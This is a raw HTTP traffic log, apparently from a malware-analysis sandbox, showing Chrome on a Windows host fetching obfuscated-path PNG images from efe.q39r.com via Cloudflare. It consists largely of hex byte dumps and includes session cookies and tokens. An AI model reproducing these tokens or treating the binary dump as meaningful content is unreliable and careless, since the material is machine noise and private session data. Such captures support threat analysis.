                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: b3 1d df b6 42 89 48 d6 a4 0d 26 aa 15 84 aa d2 4a d5 b4 89 c7 b6 59 07 48 d1 61 12 1c 8f 60 2f 61 e2 b7 1f 01 40 79 e5 b2 04 a0 66 39 3c 6a e7 6a a4 47 55 ee 05 67 e4 aa 58 c7 34 66 6e 5b 9e 8b b7 c1 95 70 53 06 d2 a4 1a 0d 97 ac 78 f5 4c fd 3a d7 2f 47 fc 72 c4 af e7 ba 9f 79 5f 01 84 7b fe f4 b4 d1 f1 34 71 2c 9d 43 2b 32 37 af c7 4a 02 c4 a8 6f 12 79 04 ce a5 fb d4 7d e5 6b ad df 52 0c 73 62 1b be 7e b2 5a 1f c4 24 12 4a 3e 0e f7 66 44 d2 1e e1 90 ac 1e 43 49 41 19 51 ed 38 d5 22 47 5a 5e 53 0f af d8 35 c0 14 03 ac da b9 33 b1 2a 54 b3 ea eb b3 05 af fd 60 d5 37 95 30 10 26 c8 e0 bf 55 5f fa 78 1b f0 5f 3c b5 67 d6 f3 c2 48 45 ea 88 3c 02 2f 2b 7f 39 f2 af 47 fc 72 e4 eb 19 33 25 60 0c 9b 83 c3 39 96 1d a1 23 75 4b 5d 49 c5 25 56 2f d1 d7 0b 2e 01 83
                                                                                  Data Ascii: BH&JYHa`/a@yf9<jjGUgX4fn[pSxL:/Gry_{4q,C+27Joy}kRsb~Z$J>fDCIAQ8"GZ^S53*T`70&U_x_<gHE</+9Gr3%`9#uK]I%V/.
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: e2 99 59 e5 7c af 67 fc 3a e3 7e e2 75 c6 7d e6 cb 5c b1 94 b4 a1 95 d2 ee d8 9c af 33 9e 67 de 3c 6e 8e 99 b6 8b 99 0a 87 3d 66 51 56 2c 04 a0 5e 51 54 5d cb 88 ac 64 da 23 2e aa 08 ff 7d 93 ab 98 8f dc 70 2d 6b aa 11 ff 55 f5 66 55 5b 09 7c 2c c6 33 b3 84 6a ec a3 a4 84 55 e3 da cc 6b 2b 6f ea 51 7a 77 ed 99 cd b7 d1 8b 86 9c f5 57 50 24 fd 71 e3 2b 5b cb ea 88 cb 4e 14 7d 46 6f 97 8d 3a 22 6a ad b5 1f 41 5d 6f 15 98 b8 76 8c d4 3a 94 97 f3 bc af 78 fb df 0a 26 08 73 77 7b 1e fc b2 e1 e7 a7 f1 d3 6d fc b4 db f3 6e 4f 57 2b 11 c1 d4 75 b2 e4 91 38 07 8e e0 be 78 38 a8 4c 59 0d c0 8e 44 28 8f 69 66 da 26 c6 d0 66 1a 03 63 81 8e 5c 39 4c 66 24 6b 78 57 1a 18 d4 48 91 70 b3 91 bc 4e 79 7a 3b 39 89 c9 00 ae dc 48 75 db 67 3e ba 7a 80 4a a1 44 ac d4 11 79 5f
                                                                                  Data Ascii: Y|g:~u}\3g<n=fQV,^QT]d#.}p-kUfU[|,3jUk+oQzwWP$q+[N}Fo:"jA]ov:x&sw{mnOW+u8x8LYD(if&fc\9Lf$kxWHpNyz;9Hug>zJDy_
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 5f 6e 7f 79 f2 2f 83 cf 03 4f 26 47 ee c3 ae e3 05 b9 e4 67 6a c5 38 53 63 ac 31 26 6a b8 30 57 30 d7 91 19 19 11 8b 76 ce b8 93 8e e9 06 37 93 0c c2 b0 34 1b 95 6a a1 b4 d1 9c da 48 38 61 1a f4 6b 2d 4d 8d b0 4b 05 95 d2 5a 11 ab 2e ff 57 b7 bd a2 9a 3a 44 00 a1 cc 15 53 78 3d e3 e5 8c 97 fb f1 72 9f 2f f7 f8 e5 d0 cb d4 4c 65 e6 39 43 37 77 c4 90 39 82 ca 58 a2 3c 33 57 f8 5a 23 22 57 66 64 c6 db ea 7a a6 00 93 23 83 aa d3 aa d6 ba 3a da 57 46 44 9c 2b ee e7 39 85 95 79 2c 9c 2b ce c4 7c 44 2c 95 82 30 d0 0c 1b 31 9c 4f c3 36 e7 6d 70 1f d4 f0 94 85 f9 e6 f4 44 fa 23 69 03 2d e5 0a 9e 73 1d 91 33 78 9f 31 43 47 e8 58 11 a1 19 d7 c5 6f 5e 4d 14 1f 23 22 0e e3 f3 36 dc 78 f3 c0 3e e4 69 4e d4 23 96 ca 5c 6f e1 50 dd 49 c8 de ea 85 ae 17 8e 1e 2d 61 73 a6
                                                                                  Data Ascii: _ny/O&Ggj8Sc1&j0W0v74jH8ak-MKZ.W:DSx=r/Le9C7w9X<3WZ#"Wfdz#:WFD+9y,+|D,01O6mpD#i-s3x1CGXo^M#"6x>iN#\oPI-as


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.1749759172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:33 UTC1544OUTGET /wxW67qXyrj6Vx0Tfu5cRa39uRp3UsvPq5ft22uk0KSw6D3TMfkrP5uXt2IKdP788HXJHkiwXCVeDyNaZS41ShN0mtBkm7fjNwOySWbWl1KwtDzywab430 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IldYRVJsTFZEZWZONDlYV1d2RzZqMGc9PSIsInZhbHVlIjoicnZDSWhZNTlyYkc0MHpvTXdhT0xsSzBJWmExZjdZdzZUVWxIL1FwMU4vMEFycGRnMWIwMFJ4V29pSDN5bXdLc01hUnRLM3dFY2U4Q1gzV2c4dUZub1ZWSS9IQ3Y5bEtGbkFWdExrQ3ZMeElDSm8yWGN5aXVST1lFTk9XbjNlc2YiLCJtYWMiOiI1NWUxMDJhNWM5MzE3MDdiMDU0MDBmMTZkOWFjYTY2NzFjM2UyMzAyN2FkNDMxM2IwMjA2MTQxMjYzOTZhYTNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZBVGlDV3lyOWJXMG1yTlp4cHEwTGc9PSIsInZhbHVlIjoiTEFOL3N6L0xQOWpWc3NYWm1tME1hZ0crZk41QkQrTEZJWTB5VTJmVFpndUdzVVRXTGpBQVUyeFFpY3NYNVY3VnN2NXRIaXVWbEY3NUNONHRIczlKdys4WWZTbTdHaWk1eE1QRzllNVl6V1JlWXpSMy9FV2htbVk4eHRGc3RlNGIiLCJtYWMiOiIyMGQ1OGU3MTNkZDUyZmZlNGQ0MWVmZDc2NzZkNTk4MzM2ZDNiNDg4NWRlZTc5MjRlNzMwNmM4N2QyMGJlMTM0IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:34 UTC710INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:34 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 259183
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="wxW67qXyrj6Vx0Tfu5cRa39uRp3UsvPq5ft22uk0KSw6D3TMfkrP5uXt2IKdP788HXJHkiwXCVeDyNaZS41ShN0mtBkm7fjNwOySWbWl1KwtDzywab430"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kq8tpqh3ow2lY6MIL1Qvx7LNPuZgcDz5fQe4ohs6D58q0XeGpQj%2B2J8zzFpORfcEl7qQE4Z9Td68z96hXLi2De1632QTsNcLSr2KjQVB4m%2FKnwRG7TIS6J0p9okJ6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada58b71ad76-ATL
                                                                                  2024-04-25 16:23:34 UTC659INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 10 00 00 00 10 00 08 06 00 00 00 f2 a3 24 17 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec dd 7b 8c 5d c7 5d 07 70 db cd 8b 52 11 1e 4d d2 78 77 66 6d 2b 02 d5 11 54 8a 49 a2 92 a0 aa 10 21 68 64 21 01 01 84 d4 a0 02 09 95 a0 04 51 a4 fc 41 d1 99 b9 4e 68 04 2a c5 50 28 ee 1f fc e1 56 50 59 14 81 82 40 22 52 4d a1 79 99 3b 73 ed e0 b4 22 29 69 08 7d 44 e4 d1 56 25 0d 71 6a 5f ce 5d 5b 55 9b c4 49 6c ef 7a ee e3 f3 91 be da f5 c6 de dd 7b ce 9c f3 1b e9 9b 3d bb 61 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: PNGIHDR$pHYs IDATx{]]pRMxwfm+TI!hd!QANh*P(VPY@"RMy;s")i}DV%qj_][UIlz{=a
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 7f 13 72 f9 6c cc e5 e8 0b 0b c4 33 4f 39 3a f9 dc 21 d7 8f f5 ef ff 7a ec ea f6 d6 2f 1d 00 00 00 00 00 80 19 a4 df 02 00 ce a6 7e ef 11 6f 1b 5e ba dc 8d ae 5a e9 ca 4f f5 fb 8f 5b fa bd c2 1f f6 f9 68 9f 4f f4 7f fe d4 89 87 0d ad f1 5e e4 6c a5 3c b5 fa 1a fa d7 b2 fa 9a 52 7d df e4 35 4e 5e eb e4 35 4f 5e fb e4 18 b4 3e 0d 00 00 00 00 00 00 30 d7 b6 de fe c0 25 ab 4f 18 cf f5 a3 21 95 c7 5b 15 88 ab 5f 7b f5 69 e3 a3 9b b6 75 07 2f 6e 7d 5c 00 00 00 00 00 00 98 4e fa 2d 00 60 3d 6d ef 0e 9f b7 65 70 e8 fb 56 ba fa b6 c9 0f bf f7 f9 93 7e f6 ff 63 9f 87 43 2e cf b5 ff 21 fd b6 59 3d 06 a9 3c d4 ef 85 fe 21 e4 fa c7 fd c7 7e 63 72 ac 36 77 07 bf 77 72 ec 5a 9f 3f 00 00 00 00 00 00 98 49 97 ed 7e e8 fc 90 cb ce 98 cb be 90 ea 91 d6 c5 e0 8b 92 ea d7 fb
                                                                                  Data Ascii: rl3O9:!z/~o^ZO[hO^l<R}5N^5O^>0%O![_{iu/n}\N-`=mepV~cC.!Y=<!~cr6wwrZ?I~
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: cf 37 2f b5 e6 24 21 d5 23 cb 83 f2 f3 ad cf 2b 00 00 00 00 00 c0 bc d2 6f e9 b7 00 98 7f 71 50 76 84 54 76 c7 5c 9e 6a 3d 2b 45 d6 33 21 d7 af f4 d9 3b 79 c0 d5 86 f1 78 63 eb 6b 0f 00 00 00 00 00 80 c6 62 1e 5d 1f fd cf 51 6b 5f cc a5 7a c4 6f 4a 01 00 00 00 00 00 58 7b fa 2d fd 16 00 f3 6b db 1d c3 0b 63 2a ef ea e7 d2 a7 5a cf 46 91 26 49 e5 70 4c c3 5f 9b 5c 0b ad af 47 00 00 00 00 00 00 1a 58 ca c3 ab 63 2a ff db bc b8 9a d7 a4 fa b5 98 47 d7 b4 3e cf 00 00 00 00 00 00 f3 42 bf a5 df 02 60 3e c5 6e 78 45 3f 87 f6 98 f3 22 c7 13 72 7d b6 cf de c9 b5 d1 fa fa 04 00 00 00 00 00 e0 2c 09 83 d1 e5 31 97 a7 5a 97 55 73 9f 54 9f 5c 19 94 37 b6 3e df 00 00 00 00 00 00 b3 4e bf a5 df 02 60 be 6c ef 0e 9f 17 06 f5 c6 7e be df df 7c fe 89 4c 73 52 bd 2f a6 f2
                                                                                  Data Ascii: 7/$!#+oqPvTv\j=+E3!;yxckb]Qk_zoJX{-kc*ZF&IpL_\GXc*G>B`>nxE?"r},1ZUsT\7>N`l~|LsR/
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: df 9a e1 e8 b7 00 66 57 b7 ff 9c 95 54 df 1d 72 fd 4a f3 79 22 22 53 9f 90 ea 97 43 1e fe e6 e4 de d1 fa f6 05 00 00 00 00 00 30 53 56 ba fd 17 84 5c be d4 ba f0 91 d3 4c 2a 4f 5f b6 fb a1 f3 5b af 23 00 00 00 00 00 80 b3 45 bf 35 e3 d1 6f 01 cc a4 d8 0d af e8 ef e3 ff d6 7c 8e 88 c8 cc 25 a4 72 70 29 0f af 6e 7d 1f 03 00 00 00 00 00 98 19 21 95 9f 6b 5d f2 c8 99 a6 fc 74 eb 75 04 00 00 00 00 00 70 b6 e8 b7 e6 21 fa 2d 80 59 b1 ed 8e e1 85 fd ec dd 1d 53 fd 7a fb f9 21 22 b3 9b 72 b4 bf 8f ec b9 ac bb ef 3b 5a df d7 00 00 00 00 00 00 a6 5e 48 e5 ef db 17 3c 72 46 49 e5 6f 5b af 23 00 00 00 00 00 80 b3 45 bf 35 07 d1 6f 01 cc 84 90 cb ce 98 ea 63 cd e7 86 88 cc 4d 42 aa 5f 08 83 7a 63 eb fb 1b 00 00 00 00 00 c0 d4 da d6 1d bc 38 a4 7a a4 75 b1 23 67 5c 8c
                                                                                  Data Ascii: fWTrJy""SC0SV\L*O_[#E5o|%rp)n}!k]tup!-YSz!"r;Z^H<rFIo[#E5ocMB_zc8zu#g\
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: f6 8a 1e cb 00 00 00 00 00 00 3b c5 af f8 de e0 f2 f2 9e e8 e7 0b 00 00 00 00 00 a0 df ec b7 1a 9c fd 16 c0 4e db 27 6b 3f 37 2d ca 95 e1 b3 5c 92 06 a5 bc bc 68 e6 fc 75 cf 8f 9e cf 00 00 00 00 00 00 3b 2c cd ab 87 c2 97 2d 9a ac 36 47 3f 5f 00 00 00 00 00 00 fd 66 bf d5 e8 ec b7 00 76 42 9a b5 5f 91 14 e5 cd 03 30 c7 25 69 c0 2a 6f 99 5e b4 0f 8d 9e d3 00 00 00 00 00 00 3b 24 cd ab c7 e2 17 2d 9a 94 ba df db e8 e7 0b 00 00 00 00 00 a0 df ec b7 1a 9c fd 16 c0 0e 4b 5a 9d f7 24 79 b9 25 7c 86 4b d2 80 96 14 d5 c3 49 ab 3a 32 7a 5e 03 00 00 00 00 00 6c 37 ff 82 54 83 f3 2f 48 01 00 00 00 00 00 0d 64 bf d5 e0 ec b7 00 b6 5f 5d ef 91 14 65 1e 3e bb 25 69 8a 94 e4 e5 d2 de ec 8c 1e df 00 00 00 00 00 00 4f 2b cd ab 87 a2 97 2b 9a b4 36 47 3f 5f 00 00 00 00 00
                                                                                  Data Ascii: ;N'k?7-\hu;,-6G?_fvB_0%i*o^;$-KZ$y%|KI:2z^l7T/Hd_]e>%iO++6G?_
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: 00 0c 81 a4 a8 be 16 bd 1c d1 ae 56 7e 35 fa 39 02 00 00 00 00 00 d8 5d ec b7 9a 90 fd 16 30 1c 66 2d 6c 3f 27 cd ab 76 fc dc 95 24 f5 a3 24 2f c7 46 b2 2b 7f 3d fa fd 02 00 00 00 00 00 34 5c d2 6a 1f 1e bd 18 d1 ae 35 9a 95 6f 8b 7e 8e 00 00 00 00 00 00 76 17 fb ad a9 9f fd 16 30 0c f6 3f f6 d2 67 27 45 b5 26 7a e6 4a 4f d5 ec 79 63 f5 cb 16 5d 55 bf 72 e9 b5 f5 6b 4f be a1 7e d3 a9 1b ea c3 cf b8 b5 3e f2 8b 77 d4 7f 75 ce 5d f5 c7 ce bb b7 fe f4 37 1e ac 5b 2b 37 4f b4 f0 bb 5b ea e3 56 fd a4 ff f9 af 8f 4d 74 d2 ea f1 fa d4 cb eb 89 7a bf fd f8 ff ff f1 ff 5d ef f7 79 fc f7 ef fd b1 7a 7f cc de 1f bb f7 e7 e8 fd b9 7a 7f ce de 9f bb f7 d7 d0 fb 6b e9 fd 35 45 7f 5d a4 a7 2a 29 ca 7f 7d 5e 76 e5 af 44 bf 67 00 00 00 00 00 80 06 1b cd 56 fd 62 52 94 f7
                                                                                  Data Ascii: V~59]0f-l?'v$$/F+=4\j5o~v0?g'E&zJOyc]UrkO~>wu]7[+7O[VMtz]yzzk5E]*)}^vDgVbR
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: ed a7 df 52 ef bf 60 6d f8 73 a8 c1 2a 29 aa f2 f9 8b c6 7e 39 fa bd 05 00 00 00 00 00 34 48 9a 77 de 1b bd 04 d1 7f 58 0a b5 3a ef 89 7e 2e 00 00 00 00 00 00 06 95 fd d6 e0 65 bf 05 34 4e 5d ef 91 14 d5 e7 a3 e7 ab 06 a7 43 4f b8 a6 fe c0 b9 77 d5 27 ad 1e 0f 3f 44 57 6c cb d6 8c d7 1f 39 ef de fa d5 27 5d 1f fe 5c 6a 70 ea be 33 ce 9d 96 d5 7b 46 bf be 00 00 00 00 00 80 a6 c8 ea 3d d3 a2 fa 5e f4 12 44 8f 2f 83 ca 55 bd 7f 91 20 fa b1 00 00 00 00 00 00 18 58 f6 5b 03 95 fd 16 d0 44 49 5e cd 8d 9e af 8a 6f bf f9 6b eb b7 9e b6 b1 9e b7 f2 a1 f0 a3 73 0d 66 c7 7c f7 e1 fa 88 33 6f ab 0f 38 66 5d f8 f3 aa 01 28 2f e7 47 bf bf 00 00 00 00 00 80 06 99 9e ad 1d 49 8b ea ae f0 25 c8 d0 57 fe 68 56 d6 4e a3 9f 07 00 00 00 00 00 80 41 67 bf 35 28 d9 6f 01 cd 93
                                                                                  Data Ascii: R`ms*)~94HwX:~.e4N]COw'?DWl9']\jp3{F=^D/U X[DI^oksf|3o8f](/GI%WhVNAg5(o
                                                                                  2024-04-25 16:23:34 UTC1369INData Raw: df b2 df 02 98 90 d5 7b a6 79 f5 cd e8 39 ab fe f4 f2 c5 57 d5 ff f0 cd 07 c3 0f b4 a5 dd d1 a7 bf f1 60 fd b2 45 57 85 ff dc a9 3f 75 3f 6f 9f 3f ad ae f7 88 7e 2d 02 00 00 00 00 00 4d 93 ad da 2b 29 ca 3c 2d ca f1 e8 85 c8 c0 96 97 db 92 bc 5c 3a 67 79 7b ef e8 6f 17 00 00 00 00 00 c0 d0 b3 df b2 df 02 86 5e f7 1d f0 f1 f0 59 ab 5d 6e 46 ab 53 1f 71 e6 6d f5 b2 35 e3 e1 47 d9 d2 ee ac f7 cc bf eb 0b b7 d7 33 e7 76 c2 7f 0e b5 eb 25 79 f5 e1 e8 f7 22 00 00 00 00 00 d0 50 69 56 bd 2e c9 cb 4d d1 0b 91 01 ec ae d1 ac 7a 43 f4 f7 07 00 00 00 00 00 80 9f 65 bf 65 bf 05 0c a7 24 2b 0f 4a 8a 72 eb 00 cc 5b ed 42 07 9f b0 be 6e ad dc 1c 7e 88 2d 45 36 ef c2 87 ea 57 2e bd 26 fc e7 51 bb 56 f7 9f 49 b6 a4 59 fb 15 d1 ef 47 00 00 00 00 00 a0 a1 f6 9d 7b 45 92 16
                                                                                  Data Ascii: {y9W`EW?u?o?~-M+)<-\:gy{o^Y]nFSqm5G3v%y"PiV.MzCee$+Jr[Bn~-E6W.&QVIYG{E


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.2.1749761172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:34 UTC1105OUTGET /ajNyX2SU9rhFeYXrhcFSd76xsstnihCYYJkPQp8lDwn8pe HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:34 UTC579INHTTP/1.1 404 Not Found
                                                                                  Date: Thu, 25 Apr 2024 16:23:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yOOtdBSOKx0sZypcN3StNOWiItbWD7Q8R10yGvQIv4EiHazNO6O6z3MkB7m3xEJlPfKnmejAFVF%2Bejz0uh7O2rL5qRf07Th%2B%2Fp7pvrk7rLMvWUtx7NR3ly13Z4UHnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fada9abb444f6-ATL
                                                                                  2024-04-25 16:23:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.2.1749763172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:34 UTC1162OUTGET /pqlrdvXLDxx8n6V4MJcB2ydokZwphsRQHgstygzowxnkE7IJ6fkdR23LED0BEqORerGVIm4SyEOoIaiiUvfdh4OuMUbyF2Lroiop420 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC707INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 79750
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="pqlrdvXLDxx8n6V4MJcB2ydokZwphsRQHgstygzowxnkE7IJ6fkdR23LED0BEqORerGVIm4SyEOoIaiiUvfdh4OuMUbyF2Lroiop420"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qvvCsCEpyu%2BQNs3HZPTwttF0JPm%2BXDKAv9UqB5N9hPOCGEPMcGhR5MXni%2FD7p4QOxxjgsHfPTf%2FkZpHQx1vh%2FW%2BuAQXZirqsmfT%2FvyYBQnO5TkMLtixD%2BBKR9ia0QA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadab6dfbb074-ATL
